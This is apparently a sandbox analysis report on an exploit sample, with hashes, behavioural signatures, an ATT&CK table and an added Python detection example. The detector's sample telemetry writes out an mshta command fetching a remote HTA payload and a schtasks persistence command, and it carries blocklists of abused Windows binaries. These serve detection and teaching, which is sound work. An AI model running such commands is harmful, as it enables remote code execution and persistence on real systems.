General

  • Target

    SecuriteInfo.com.Exploit.Siggen3.17232.15725.4211

  • Size

    33KB

  • Sample

    220816-jlyxfsebhm

  • MD5

    40d7c7dfe04afec62912d621675ea1c3

  • SHA1

    3e2bed02260873ebaac655fac95254793783a39e

  • SHA256

    6499e81154bb08f3687529904a6e749a51c6817f06b7d8aec130bed97e60ab6d

  • SHA512

    b032da98c72117d40091342e19561740f56aac62638c5e423c6c3aa37144fc2208feb1579ae783a5da4d6557f1a243727febbacb1e28be71a5bcf046082b36d8

Score
10/10

Malware Config

Targets

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request
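The two signatures above are generic behavioural rules rather than sample-specific indicators. As an added example (not code from the sandbox report or its vendor), the block below implements both as checks over process-creation and network-connection telemetry in the shape Sysmon event IDs 1 and 3 provide, and tags a hit with an ATT&CK technique ID from the matrix below where the child command line makes the technique unambiguous. The parent/child lists, the network blocklist, the event field names and all sample events are constructed assumptions for the example; tune them to the environment before relying on them.

```python
# Added example, not code from the sandbox report.  Two rules that
# reproduce the report's two signatures over constructed Sysmon-style
# events; process names, the blocklist and the event shape are assumptions.

from dataclasses import dataclass
from typing import Iterable, List, Tuple

# Parents that open attacker-controlled content and should not spawn
# shells, script hosts or LOLBins (constructed list; tune per environment).
DOCUMENT_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe",
                    "outlook.exe", "acrord32.exe"}
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
                       "mshta.exe", "rundll32.exe", "regsvr32.exe",
                       "schtasks.exe", "certutil.exe", "reg.exe"}

# Binaries that should not make outbound connections on a workstation
# (constructed blocklist).
NETWORK_BLOCKLIST = {"mshta.exe", "regsvr32.exe", "rundll32.exe",
                     "certutil.exe", "schtasks.exe"}

# Child command lines that map onto techniques the report's matrix lists.
# Only unambiguous cases are tagged; everything else stays untagged.
TECHNIQUE_HINTS = (
    ("schtasks.exe", "/create", "T1053"),   # Scheduled Task
    ("reg.exe", "add", "T1112"),            # Modify Registry
)

@dataclass(frozen=True)
class ProcessEvent:        # Sysmon EID 1 / Windows 4688 subset (assumed shape)
    pid: int
    image: str
    parent_image: str
    command_line: str

@dataclass(frozen=True)
class NetworkEvent:        # Sysmon EID 3 subset (assumed shape)
    pid: int
    image: str
    dest_ip: str
    dest_port: int

def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def unexpected_child(ev: ProcessEvent) -> bool:
    """Signature 1: a document handler spawned a shell, script host or LOLBin."""
    return (basename(ev.parent_image) in DOCUMENT_PARENTS
            and basename(ev.image) in SUSPICIOUS_CHILDREN)

def technique_for(ev: ProcessEvent) -> str:
    """ATT&CK technique ID for the child, or '' when no hint matches."""
    image = basename(ev.image)
    cmd = ev.command_line.lower()
    for child, keyword, tid in TECHNIQUE_HINTS:
        if image == child and keyword in cmd:
            return tid
    return ""

def blocklisted_network(ev: NetworkEvent) -> bool:
    """Signature 2: a blocklisted binary opened an outbound connection."""
    return basename(ev.image) in NETWORK_BLOCKLIST

def run_rules(procs: Iterable[ProcessEvent],
              conns: Iterable[NetworkEvent]) -> List[Tuple[str, str, str]]:
    """Return (signature, technique, detail) triples, one per matching event."""
    hits = []
    for ev in procs:
        if unexpected_child(ev):
            hits.append(("Process spawned unexpected child process",
                         technique_for(ev),
                         f"{basename(ev.parent_image)} -> {basename(ev.image)} pid={ev.pid}"))
    for ev in conns:
        if blocklisted_network(ev):
            hits.append(("Blocklisted process makes network request", "",
                         f"{basename(ev.image)} pid={ev.pid} -> {ev.dest_ip}:{ev.dest_port}"))
    return hits

# Constructed sample telemetry: a document reader spawning a scheduler and
# a LOLBin that then calls out, plus benign activity that must not fire.
SAMPLE_PROCS = [
    ProcessEvent(4120, r"C:\Windows\System32\schtasks.exe",
                 r"C:\Program Files\Microsoft Office\WINWORD.EXE",
                 'schtasks.exe /create /tn Updater /tr "C:\\Users\\Public\\u.vbs" /sc minute'),
    ProcessEvent(4188, r"C:\Windows\System32\mshta.exe",
                 r"C:\Program Files\Microsoft Office\WINWORD.EXE",
                 "mshta.exe http://198.51.100.7/p.hta"),
    ProcessEvent(4200, r"C:\Windows\System32\cmd.exe",
                 r"C:\Windows\explorer.exe", "cmd.exe /c dir"),   # interactive shell: benign
]
SAMPLE_CONNS = [
    NetworkEvent(4188, r"C:\Windows\System32\mshta.exe", "198.51.100.7", 80),
    NetworkEvent(2040, r"C:\Program Files\Mozilla Firefox\firefox.exe", "203.0.113.9", 443),
]

if __name__ == "__main__":
    for sig, tid, detail in run_rules(SAMPLE_PROCS, SAMPLE_CONNS):
        print(f"[{sig}] {tid or '-'} {detail}")
```

Running it on the constructed events yields three hits: the schtasks child (tagged T1053), the mshta child (untagged), and the mshta outbound connection; the explorer.exe-launched cmd.exe and the browser connection do not fire. Correlating the two signatures on pid 4188 is what turns two generic alerts into the "exploit dropped a stager that phoned home" story the report's score reflects.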

MITRE ATT&CK Matrix (ATT&CK v6)

  Tactic                 Technique                      Count  ID
  Execution              Scheduled Task                 1      T1053
  Persistence            Scheduled Task                 1      T1053
  Privilege Escalation   Scheduled Task                 1      T1053
  Defense Evasion        Modify Registry                1      T1112
  Discovery              Query Registry                 2      T1012
  Discovery              System Information Discovery   2      T1082
  Discovery              Remote System Discovery        1      T1018

  Count is the number of matched behaviours mapped to that technique. IDs follow ATT&CK v6, which predates sub-techniques; in current ATT&CK the Windows scheduled-task behaviour is T1053.005 and the other IDs are unchanged at the technique level.

Tasks